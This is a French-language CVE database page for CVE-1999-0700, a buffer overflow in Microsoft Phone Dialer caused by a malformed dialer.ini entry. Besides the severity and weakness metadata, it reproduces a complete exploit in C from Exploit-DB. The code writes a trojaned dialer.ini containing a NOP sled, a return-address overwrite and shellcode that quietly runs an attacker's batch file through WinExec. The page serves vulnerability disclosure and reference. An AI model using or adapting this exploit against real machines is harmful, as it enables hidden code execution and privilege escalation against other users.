CVE-1999-0700 : Détail

CVE-1999-0700

Overflow
0.04%V3
Local
2000-01-04
04h00 +00:00
2024-08-01
16h48 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Buffer overflow in Microsoft Phone Dialer (dialer.exe), via a malformed dialer entry in the dialer.ini file.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer
The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 6.2 AV:L/AC:H/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 19440

Date de publication : 1999-07-29 22h00 +00:00
Auteur : David Litchfield
EDB Vérifié : Yes

// source: https://www.securityfocus.com/bid/554/info Dialer.exe has an unchecked buffer in the part of the program that reads dialer entries from %systemroot%\dialer.ini. A specially-formed entry could cause arbitrary code to be run on the machine. By default, the %systemroot% folder is world-writeable. Dialer.ini is Dialer runs in the security context of the user, so an attacker would have to have a higher authority user dial the entry to gain any escalated priveleges. The following code will create a trojaned dialer.ini file that when read in by dialer will cause it to run a batch file called code.bat - this is hidden from the desktop by calling the equivalent of WinExec("code.bat",0); - and then ExitProcess(0); is called to shutup dialer.exe. Once the dialer.ini has been trojaned the attacker would create a batch file called code.bat and place in there any commands they wished to be run. Needless to say that if a user with admin rights runs dialer any commands placed in this batch file are likely to succeed. #include <stdio.h> #include <windows.h> int main(void) { FILE *fd; char ExploitCode[256]; int count = 0; while (count < 100) { ExploitCode[count]=0x90; count ++; } // ExploitCode[100] to ExploitCode[103] overwrites the real return address // with 0x77F327E5 which contains a "jmp esp" instruction taking us back // to our payload of exploit code ExploitCode[100]=0xE5; ExploitCode[101]=0x27; ExploitCode[102]=0xF3; ExploitCode[103]=0x77; // procedure prologue - push ebp // mov ebp,esp ExploitCode[104]=0x55; ExploitCode[105]=0x8B; // This moves into the eax register the address where WinExec() is found // in kernel32.dll at address 0x77F1A9DA - This address has been hard- // coded in to save room rather than going through LoadLibrary() and // GetProcAddress () to get the address - since we've already hard // coded in the return address from kernel32.dll - there seems no // harm in doing this ExploitCode[106]=0xEC; ExploitCode[107]=0xB8; ExploitCode[108]=0xDA; ExploitCode[109]=0xA9; ExploitCode[110]=0xF1; ExploitCode[111]=0x77; // We need some NULLs to terminate a string - to do this we xor the esi // register with itself - xor esi,esi ExploitCode[112]=0x33; ExploitCode[113]=0xF6; // These NULLs are then pushed onto the stack - push esi ExploitCode[114]=0x56; // Now the name of the batch file to be run is pushed onto the stack // We'll let WinExec() pick up the file - we use push here // to push on "tab." (code.bat) ExploitCode[115]=0x68; ExploitCode[116]=0x2E; ExploitCode[117]=0x62; ExploitCode[118]=0x61; ExploitCode[119]=0x74; // And now we push on "edoc" ExploitCode[120]=0x68; ExploitCode[121]=0x63; ExploitCode[122]=0x6F; ExploitCode[123]=0x64; ExploitCode[124]=0x65; // We push the esi (our NULLs) again - this will be used by WinExec() to determine // whether to display a window on the desktop or not - in this case it will not ExploitCode[125]=0x56; // The address of the "c" of code.bat is loaded into the edi register - this // becomes a pointer to the name of what we want to tell WinExec() to run ExploitCode[126]=0x8D; ExploitCode[127]=0x7D; ExploitCode[128]=0xF4; // This is then pushed onto the stack ExploitCode[129]=0x57; // With everything primed we then call WinExec() - this will then run code.bat ExploitCode[130]=0xFF; ExploitCode[131]=0xD0; // With the batch file running we then call ExitProcess () to stop dialer.exe // from churning out an Access Violation message - first the procedure //prologue push ebp and movebp,esp ExploitCode[132]=0x55; ExploitCode[133]=0x8B; ExploitCode[134]=0xEC; // We need to give ExitProcess() an exit code - we'll give it 0 to use - we need // some NULLs then - xor esi,esi ExploitCode[135]=0x33; ExploitCode[136]=0xF6; // and we need them on the stack - push esi ExploitCode[137]=0x56; // Now we mov the address for ExitProcess() into the EAX register - again we // we hard code this in tieing this exploit to NT 4.0 SP4 ExploitCode[138]=0xB8; ExploitCode[139]=0xE6; ExploitCode[140]=0x9F; ExploitCode[141]=0xF1; ExploitCode[142]=0x77; // And then finally call it ExploitCode[143]=0xFF; ExploitCode[144]=0xD0; // Now to create the trojaned dialer.ini file fd = fopen("dialer.ini", "w+"); if (fd == NULL) { printf("Couldn't create dialer.ini"); return 0; } // Give dialer.exe what it needs from dialer.ini fprintf(fd,"[Preference]\nPreferred Line=148446\nPreferred Address=0\nMain Window Left/Top=489, 173\n[Last dialed numbers]\nLast dialed 1="); // And inject our exploit code fprintf(fd,ExploitCode); fclose(fd); }

Products Mentioned

Configuraton 0

Microsoft>>Windows_2000 >> Version *

Microsoft>>Windows_nt >> Version *

Microsoft>>Windows_nt >> Version 4.0

Microsoft>>Windows_nt >> Version 4.0

Microsoft>>Windows_nt >> Version 4.0

Microsoft>>Windows_nt >> Version 4.0

Microsoft>>Windows_nt >> Version 4.0

Microsoft>>Windows_nt >> Version 4.0

Références